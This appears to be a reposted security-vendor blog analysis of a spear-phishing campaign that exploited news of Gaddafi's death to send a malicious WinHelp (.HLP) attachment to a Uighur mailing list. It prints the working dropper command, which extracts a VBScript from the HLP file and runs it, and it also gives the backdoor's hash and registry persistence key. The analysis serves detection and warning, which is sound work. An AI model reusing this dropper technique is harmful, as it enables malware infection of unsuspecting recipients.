Loading...

Beware - Gaddafi malware on Internet

As is not unusual when big news breaks, malware authors try to take advantage of the sitiuation.  This time, semi-targeted malware emails ...

As is not unusual when big news breaks, malware authors try to take advantage of the sitiuation.  This time, semi-targeted malware emails has been found in the wake of the news of Gadhafi’s death.
The email below was sent to a mailing list that receives information pertaining to the Uighur people. The mail appears to have been sent from Korea.

It reads:
The attachment is something of a dinosaur. It is a *.HLP file. The HLP file format was used by WinHelp in earlier Windows versions up to and including Windows XP, and would typically contain helpful information about the usage of applications. However, it also supported a macro language, which could do a lot of things – including executing files through the EF() macro.

The rest is an obfuscated javascript that is fed to MSHTA.EXE. This javascript feeds execution to a VBScript:
new ActiveXObject('WSCRIPT.SHELL').RUN('CMD /C FOR /F "USEBACKQDELIMS=" %I IN (`DIR/B *.HLP`)DO FINDSTR /B INT3 "%I">C:/A.VBS&C:/A.VBS',0);close()
This script unpacks the main payload,  an UPX-packed executable, which is 22016 bytes long. MD5 : 5d46db1a440467555cd6f7505d5ace65.
This is a backdoor trojan that exchanges encoded status information with an IP in China. We will be detecting this as W32/Backtsa, from the text string this trojan uses to register itself in the registry with:
%currentuser%\software\backtsaleht [stubpath]
This quite simple setup is rather common for attacks that are targeted, but not against really high-value targets.

Post a Comment

emo-but-icon

Home item

Zebronics

Recommend on Google

Advertisements

Advertisements

Popular Posts

Random Posts

Recent Posts

ADS

eXTReMe Tracker